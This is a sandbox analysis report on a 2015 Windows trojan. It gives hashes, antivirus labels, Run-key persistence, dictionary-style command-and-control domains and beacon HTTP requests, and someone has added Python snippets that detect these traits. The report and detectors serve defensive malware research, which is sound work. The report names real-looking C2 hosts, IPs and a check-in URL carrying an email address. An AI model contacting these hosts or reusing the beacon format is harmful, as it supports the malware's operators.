Analysis Date: 2015-08-12 09:38:31
MD5: 668e98f169c358aa53ae318cf79fe9bb
SHA1: 6d605747de2aa345bcaf5f2e22b03c6793b94ef1

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text  md5: e92f4a3c5cbc36ff8647ad7fbe713b30 sha1: 08a47eb473ee24198b9085184a5f6056102f85c0 size: 299008
Section .rdata md5: 38331fdcd8623a6c5ec1ea221bc778a3 sha1: fec02edf0cdf59d23b6bec3c5b61202d277f071a size: 34816
Section .data  md5: 6c5a41b1d76e727fc53e79a9b1fe2afa sha1: f53116c43795601748f6d50041b656fc5e8c199a size: 103936
Timestamp: 2015-01-29 10:26:22
Packer: Microsoft Visual C++ ?.?
PEhash: 88cb5c34be3d9c8177629f5b9344e6a06df1aeae
IMPhash: 9b960c19901ee8a5f2f73be8d54ec22e
AV Rising: no_virus
AV CA (E-Trust Ino): no_virus
AV F-Secure: Gen:Variant.Symmi.22722
AV Dr. Web: Trojan.DownLoader13.35054
AV ClamAV: no_virus
AV Arcabit (arcavir): Gen:Variant.Symmi.22722
AV BullGuard: Gen:Variant.Symmi.22722
AV Padvish: no_virus
AV VirusBlokAda (vba32): no_virus
AV CAT (quickheal): Trojan.Dynamer.AC3
AV Trend Micro: TSPY_NIVDORT.SMB
AV Kaspersky: Trojan.Win32.Generic
AV Zillya!: no_virus
AV Emsisoft: Gen:Variant.Symmi.22722
AV Ikarus: Trojan.Win32.Agent
AV Frisk (f-prot): no_virus
AV Authentium: W32/Wonton.B.gen!Eldorado
AV MalwareBytes: Trojan.Zbot.WHE
AV MicroWorld (escan): Gen:Variant.Symmi.22722
AV Microsoft Security Essentials: TrojanSpy:Win32/Nivdort.BD
AV K7: Trojan ( 004cb2771 )
AV BitDefender: Gen:Variant.Symmi.22722
AV Fortinet: W32/Agent.VNC!tr
AV Symantec: Downloader.Upatre!g15
AV Grisoft (avg): Win32/Cryptor
AV Eset (nod32): Win32/Agent.VNC
AV Alwil (avast): Downloader-TLD [Trj]
AV Ad-Aware: Gen:Variant.Symmi.22722
AV Twister: Trojan.Agent.VNC.aanx.mg
AV Avira (antivir): TR/Crypt.ZPACK.Gen8
AV Mcafee: Trojan-FEMT!668E98F169C3

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\TP Extensible BranchCache Trap AutoConnect ➝
C:\Documents and Settings\Administrator\Application Data\axjdweetwez\filicvnd.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\axjdweetwez\filicvnd.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\axjdweetwez\filicvnd.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\axjdweetwez\filicvnd.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\axjdweetwez\wqqrncyq.exe
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\axjdweetwez\filicvnd.rcu
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\axjdweetwez\filicvnd.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\axjdweetwez\filicvnd.exe"
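The runtime log above is a short chain: a Run value with a Windows-sounding name that points to an executable dropped under the user's Application Data, that dropped file being started, and a second launch whose command line is the literal WATCHDOGPROC followed by the dropped executable's own path. The following is an added example, not part of the sandbox output: it transcribes those events and applies the three checks a triage script would run over them (Run value into the profile, dropped-then-executed, self-relaunch with the dropped path as argument). The event schema, rule names and the assumed-Windows path regexes are this example's own.

```python
import re
from typing import Dict, List

# Runtime events transcribed from the report above. The Run-key entry carries
# its target path separately; every path is exactly as the report lists it.
DROP_DIR = r"C:\Documents and Settings\Administrator\Application Data\axjdweetwez"
REPORT_EVENTS: List[Dict[str, str]] = [
    {"event": "Registry",
     "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
            r"\TP Extensible BranchCache Trap AutoConnect",
     "value": DROP_DIR + r"\filicvnd.exe"},
    {"event": "Creates File", "value": DROP_DIR + r"\filicvnd.exe"},
    {"event": "Creates Process", "value": DROP_DIR + r"\filicvnd.exe"},
    {"event": "Creates File", "value": DROP_DIR + r"\wqqrncyq.exe"},
    {"event": "Creates File", "value": r"\Device\Afd\Endpoint"},
    {"event": "Creates File", "value": DROP_DIR + r"\filicvnd.rcu"},
    {"event": "Creates Process", "value": 'WATCHDOGPROC "' + DROP_DIR + r'\filicvnd.exe"'},
]

# Assumed key/path shapes: the classic Run/RunOnce autostart keys, and the
# XP-era "Application Data" seen here plus the Vista+ "AppData" tree.
RUN_KEY_RE = re.compile(r"\\Windows\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
PROFILE_DATA_RE = re.compile(r"\\(Application Data|AppData)\\", re.IGNORECASE)
QUOTED_EXE_RE = re.compile(r'"([^"]+\.exe)"', re.IGNORECASE)


def triage_runtime(events: List[Dict[str, str]]) -> List[str]:
    """Flag the three behaviours the runtime log shows: a Run value pointing
    into the user profile, a dropped executable that is then started, and a
    relaunch that passes the dropped executable as an argument."""
    dropped = {e["value"].lower() for e in events
               if e["event"] == "Creates File" and e["value"].lower().endswith(".exe")}
    findings: List[str] = []
    for e in events:
        value = e["value"]
        if e["event"] == "Registry":
            # The value name is chosen to look legitimate, so key on the target
            # path, not on the name.
            if RUN_KEY_RE.search(e.get("key", "")) and PROFILE_DATA_RE.search(value):
                name = e["key"].rsplit("\\", 1)[-1]
                findings.append(f"persistence: Run value '{name}' -> {value}")
        elif e["event"] == "Creates Process":
            if value.lower() in dropped:
                findings.append(f"dropped-and-executed: {value}")
                continue
            m = QUOTED_EXE_RE.search(value)
            # Image name is not the dropped file, but the dropped file is the
            # quoted argument: the WATCHDOGPROC relaunch pattern above.
            if m and m.group(1).lower() in dropped \
                    and not value.lower().lstrip('"').startswith(m.group(1).lower()):
                findings.append(f"self-relaunch: '{value.split(' ', 1)[0]}' "
                                f"started with dropped executable as argument: {m.group(1)}")
    return findings


if __name__ == "__main__":
    for line in triage_runtime(REPORT_EVENTS):
        print(line)
```

On a live host the same checks apply to the Run and RunOnce values under both HKCU and HKLM; a value whose target sits under the profile and whose directory name is not one a known installer creates is worth pulling for hashing against the MD5/SHA1 at the top of this report.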

Network Details:

DNS: buildingcharge.net (Type: A) ➝ 195.22.26.231
DNS: buildingcharge.net (Type: A) ➝ 195.22.26.252
DNS: buildingcharge.net (Type: A) ➝ 195.22.26.253
DNS: buildingcharge.net (Type: A) ➝ 195.22.26.254
DNS: fellowsingle.net (Type: A) ➝ 95.211.230.75
DNS: resultperiod.net (Type: A)
DNS: brokenhowever.net (Type: A)
DNS: resulthowever.net (Type: A)
DNS: preparechoose.net (Type: A)
DNS: desirechoose.net (Type: A)
DNS: preparealthough.net (Type: A)
DNS: desirealthough.net (Type: A)
DNS: prepareperiod.net (Type: A)
DNS: desireperiod.net (Type: A)
DNS: preparehowever.net (Type: A)
DNS: desirehowever.net (Type: A)
DNS: strengthchoose.net (Type: A)
DNS: stillchoose.net (Type: A)
DNS: strengthalthough.net (Type: A)
DNS: stillalthough.net (Type: A)
DNS: strengthperiod.net (Type: A)
DNS: stillperiod.net (Type: A)
DNS: strengthhowever.net (Type: A)
DNS: stillhowever.net (Type: A)
DNS: movementsingle.net (Type: A)
DNS: outsidesingle.net (Type: A)
DNS: movementcharge.net (Type: A)
DNS: outsidecharge.net (Type: A)
DNS: movementdifference.net (Type: A)
DNS: outsidedifference.net (Type: A)
DNS: movementevery.net (Type: A)
DNS: outsideevery.net (Type: A)
DNS: buildingsingle.net (Type: A)
DNS: eveningsingle.net (Type: A)
DNS: eveningcharge.net (Type: A)
DNS: buildingdifference.net (Type: A)
DNS: eveningdifference.net (Type: A)
DNS: buildingevery.net (Type: A)
DNS: eveningevery.net (Type: A)
DNS: storesingle.net (Type: A)
DNS: mightsingle.net (Type: A)
DNS: storecharge.net (Type: A)
DNS: mightcharge.net (Type: A)
DNS: storedifference.net (Type: A)
DNS: mightdifference.net (Type: A)
DNS: storeevery.net (Type: A)
DNS: mightevery.net (Type: A)
DNS: doctorsingle.net (Type: A)
DNS: prettysingle.net (Type: A)
DNS: doctorcharge.net (Type: A)
DNS: prettycharge.net (Type: A)
DNS: doctordifference.net (Type: A)
DNS: prettydifference.net (Type: A)
DNS: doctorevery.net (Type: A)
DNS: prettyevery.net (Type: A)
DNS: doublesingle.net (Type: A)
DNS: fellowcharge.net (Type: A)
DNS: doublecharge.net (Type: A)
DNS: fellowdifference.net (Type: A)
DNS: doubledifference.net (Type: A)
DNS: fellowevery.net (Type: A)
DNS: doubleevery.net (Type: A)
DNS: brokensingle.net (Type: A)
DNS: resultsingle.net (Type: A)
DNS: brokencharge.net (Type: A)
DNS: resultcharge.net (Type: A)
DNS: brokendifference.net (Type: A)
DNS: resultdifference.net (Type: A)
DNS: brokenevery.net (Type: A)
DNS: resultevery.net (Type: A)
DNS: preparesingle.net (Type: A)
DNS: desiresingle.net (Type: A)
DNS: preparecharge.net (Type: A)
DNS: desirecharge.net (Type: A)
DNS: preparedifference.net (Type: A)
DNS: desiredifference.net (Type: A)
DNS: prepareevery.net (Type: A)
DNS: desireevery.net (Type: A)
DNS: strengthsingle.net (Type: A)
DNS: stillsingle.net (Type: A)
DNS: strengthcharge.net (Type: A)
DNS: stillcharge.net (Type: A)
DNS: strengthdifference.net (Type: A)
DNS: stilldifference.net (Type: A)
DNS: strengthevery.net (Type: A)
DNS: stillevery.net (Type: A)
DNS: expectmatter.net (Type: A)
DNS: becausematter.net (Type: A)
HTTP GET: http://buildingcharge.net/index.php?email=office@moldoglass.ro&method=post&len
User-Agent: (no User-Agent header is sent; see Raw Pcap)
HTTP GET: http://fellowsingle.net/index.php?email=office@moldoglass.ro&method=post&len
User-Agent: (no User-Agent header is sent; see Raw Pcap)
Flows TCP: 192.168.1.1:1031 ➝ 195.22.26.231:80
Flows TCP: 192.168.1.1:1032 ➝ 95.211.230.75:80
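Every name in the query list above is two English words joined under .net, only buildingcharge.net and fellowsingle.net are listed with addresses, and the two HTTP requests go to exactly those two hosts. That shape is what a DNS-side detector can key on. The following is an added example, not part of the sandbox output: it replays a subset of the queries above, plus one constructed control lookup (www.example.com, not in the report), through a summary that counts distinct names, unanswered lookups and two-word labels, then applies illustrative thresholds. The vocabulary is assembled from the labels on this page; that the sample draws from a fixed word list, and the threshold values, are assumptions of this example.

```python
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Vocabulary assembled from the labels in the query list above. It is an
# assumption that the sample draws from a fixed word list; the real list is
# not on this page.
VOCAB = frozenset("""
building charge fellow single result period broken however prepare choose
desire although strength still movement outside difference every evening
store might doctor pretty double expect because matter
""".split())

# (queried name, answer or None). The first 28 records are transcribed from the
# report above; the final record is a constructed control, not from the report.
QUERY_LOG: List[Tuple[str, Optional[str]]] = [
    ("buildingcharge.net", "195.22.26.231"), ("buildingcharge.net", "195.22.26.252"),
    ("buildingcharge.net", "195.22.26.253"), ("buildingcharge.net", "195.22.26.254"),
    ("fellowsingle.net", "95.211.230.75"),
] + [(label + ".net", None) for label in """
resultperiod brokenhowever resulthowever preparechoose desirechoose
preparealthough desirealthough prepareperiod desireperiod preparehowever
desirehowever strengthchoose stillchoose strengthalthough stillalthough
strengthperiod stillperiod strengthhowever stillhowever movementsingle
outsidesingle expectmatter becausematter
""".split()] + [("www.example.com", "192.0.2.10")]   # constructed control


def two_word_split(name: str, vocab=VOCAB) -> Optional[Tuple[str, str]]:
    """Return (w1, w2) if the registrable label is exactly two vocabulary
    words glued together, else None."""
    parts = name.lower().rstrip(".").split(".")
    if len(parts) < 2:
        return None
    label = parts[-2]
    for i in range(1, len(label)):
        if label[:i] in vocab and label[i:] in vocab:
            return label[:i], label[i:]
    return None


def summarize(log: List[Tuple[str, Optional[str]]]) -> Dict[str, float]:
    """Collapse repeated queries per name and count how many never got an
    answer and how many decompose into two vocabulary words."""
    answers: Dict[str, set] = defaultdict(set)
    for name, answer in log:
        bucket = answers[name.lower()]
        if answer:
            bucket.add(answer)
    distinct = len(answers)
    resolved = sum(1 for a in answers.values() if a)
    two_word = sum(1 for n in answers if two_word_split(n))
    return {"queries": len(log), "distinct": distinct, "resolved": resolved,
            "unresolved": distinct - resolved, "two_word": two_word,
            "unresolved_ratio": (distinct - resolved) / distinct if distinct else 0.0}


def looks_like_dictionary_dga(summary: Dict[str, float], min_distinct: int = 20,
                              min_unresolved_ratio: float = 0.8,
                              min_two_word_ratio: float = 0.8) -> bool:
    """Thresholds are illustrative assumptions, not values from the report."""
    if summary["distinct"] < min_distinct:
        return False
    return (summary["unresolved_ratio"] >= min_unresolved_ratio
            and summary["two_word"] / summary["distinct"] >= min_two_word_ratio)


if __name__ == "__main__":
    s = summarize(QUERY_LOG)
    print(s, looks_like_dictionary_dga(s))
```

The unresolved ratio carries most of the weight: the word-pair check is cheap to evade by changing the list, but a client that asks for dozens of registrable names and gets answers for two is unusual regardless of how the names are built. Run over a full day of resolver logs, the summary should be computed per source host and per time window rather than over the whole log.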

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f6666 69636540 6d6f6c64   mail=office@mold
0x00000020 (00032)   6f676c61 73732e72 6f266d65 74686f64   oglass.ro&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206275 696c6469   se..Host: buildi
0x00000070 (00112)   6e676368 61726765 2e6e6574 0d0a0d0a   ngcharge.net....
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6f6666 69636540 6d6f6c64   mail=office@mold
0x00000020 (00032)   6f676c61 73732e72 6f266d65 74686f64   oglass.ro&method
0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206665 6c6c6f77   se..Host: fellow
0x00000070 (00112)   73696e67 6c652e6e 65740d0a 0d0a0d0a   single.net......
0x00000080 (00128)                                         
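The two hex dumps above are the only verbatim copy of what the sample put on the wire, so they are worth parsing rather than reading by eye. The following is an added example, not part of the sandbox output: it rebuilds the request bytes from the hex column of each dump, parses the request line, headers and query string, and lists the traits both requests share (no User-Agent header, HTTP/1.0, GET /index.php?email=...&method=post&len with a valueless len). The second dump carries one extra CRLF after the headers; the parser keeps it as leftover body instead of failing. The HttpRequest type and the indicator names are this example's own.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List
from urllib.parse import parse_qsl, urlsplit

# Both requests from the "Raw Pcap" section above, copied as printed there.
DUMP_1 = """
    0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
    0x00000010 (00016)   6d61696c 3d6f6666 69636540 6d6f6c64   mail=office@mold
    0x00000020 (00032)   6f676c61 73732e72 6f266d65 74686f64   oglass.ro&method
    0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
    0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
    0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
    0x00000060 (00096)   73650d0a 486f7374 3a206275 696c6469   se..Host: buildi
    0x00000070 (00112)   6e676368 61726765 2e6e6574 0d0a0d0a   ngcharge.net....
    0x00000080 (00128)
"""
DUMP_2 = """
    0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
    0x00000010 (00016)   6d61696c 3d6f6666 69636540 6d6f6c64   mail=office@mold
    0x00000020 (00032)   6f676c61 73732e72 6f266d65 74686f64   oglass.ro&method
    0x00000030 (00048)   3d706f73 74266c65 6e204854 54502f31   =post&len HTTP/1
    0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
    0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
    0x00000060 (00096)   73650d0a 486f7374 3a206665 6c6c6f77   se..Host: fellow
    0x00000070 (00112)   73696e67 6c652e6e 65740d0a 0d0a0d0a   single.net......
    0x00000080 (00128)
"""
RAW_PCAP_DUMPS: List[str] = [DUMP_1, DUMP_2]

# Hex offset, decimal offset, then up to four 8-hex-digit groups. The ASCII
# column is ignored on purpose: the sandbox prints non-printables as '.'.
HEX_LINE_RE = re.compile(
    r"^0x[0-9a-f]{8}\s+\(\d+\)\s+((?:[0-9a-f]{8} ){0,3}[0-9a-f]{2,8})", re.IGNORECASE)


@dataclass
class HttpRequest:
    method: str
    path: str
    version: str
    headers: Dict[str, str] = field(default_factory=dict)   # names lower-cased
    query: Dict[str, str] = field(default_factory=dict)
    body: bytes = b""


def dump_to_bytes(dump: str) -> bytes:
    """Rebuild the raw bytes of one request from the hex column of the dump."""
    out = bytearray()
    for line in dump.splitlines():
        m = HEX_LINE_RE.match(line.strip())
        if m:
            out += bytes.fromhex(m.group(1).replace(" ", ""))
    return bytes(out)


def parse_http_request(raw: bytes) -> HttpRequest:
    """Minimal HTTP/1.x request parser: request line, headers, leftover body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("ascii", errors="replace").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for h in lines[1:]:
        name, _, val = h.partition(":")
        headers[name.strip().lower()] = val.strip()
    parts = urlsplit(target)
    # keep_blank_values keeps the valueless "len" key the sample sends.
    query = dict(parse_qsl(parts.query, keep_blank_values=True))
    return HttpRequest(method, parts.path, version, headers, query, body)


def beacon_indicators(req: HttpRequest) -> List[str]:
    """Traits shared by both captured requests; all three together make a
    usable network signature for this sample's check-in."""
    hits: List[str] = []
    if "user-agent" not in req.headers:
        hits.append("no User-Agent header")
    if req.version == "HTTP/1.0":
        hits.append("HTTP/1.0 request line")
    if (req.method == "GET" and req.path == "/index.php"
            and {"email", "method", "len"} <= set(req.query)
            and req.query.get("method") == "post"):
        hits.append("GET /index.php?email=...&method=post&len")
    return hits


if __name__ == "__main__":
    for dump in RAW_PCAP_DUMPS:
        req = parse_http_request(dump_to_bytes(dump))
        print(req.headers.get("host"), req.query, beacon_indicators(req))
```

The absence of a User-Agent header is the strongest single trait here: the report's "User-Agent:" field is empty because no such header exists in the bytes, which is rare for a browser or a Windows HTTP API client and easy to match on a proxy. The e-mail address in the query string is part of the request as captured and should be treated as an indicator, not as the analyst's own data.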


Strings